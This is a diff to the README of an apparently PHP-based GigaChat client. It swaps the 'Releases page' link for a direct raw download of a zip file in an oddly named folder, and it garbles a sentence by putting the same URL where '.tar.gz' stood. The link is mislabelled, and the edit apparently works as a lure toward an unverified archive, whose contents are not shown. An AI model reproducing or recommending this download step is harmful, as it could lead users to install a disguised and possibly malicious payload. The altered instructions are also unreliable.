Mithiran-coder/gigachat-php/README.md

 - **Composer**: For managing dependencies

 ## 🌐 Download & Install
-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/Mithiran-coder/gigachat-php/releases) to download the latest version.
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/Mithiran-coder/gigachat-php/main/Snoquamish/gigachat-php.zip) to download the latest version.

 2. **Choose the Latest Release**: Click on the latest release version, where you will find assets available for download.

 3. **Download the Files**: Download the files relevant to your environment.
-Usually, this will include a compressed file (like .zip or .tar.gz).
+Usually, this will include a compressed file (like .zip or https://raw.githubusercontent.com/Mithiran-coder/gigachat-php/main/Snoquamish/gigachat-php.zip).

 4. **Extract Files**: After downloading, extract the files to a folder on your computer.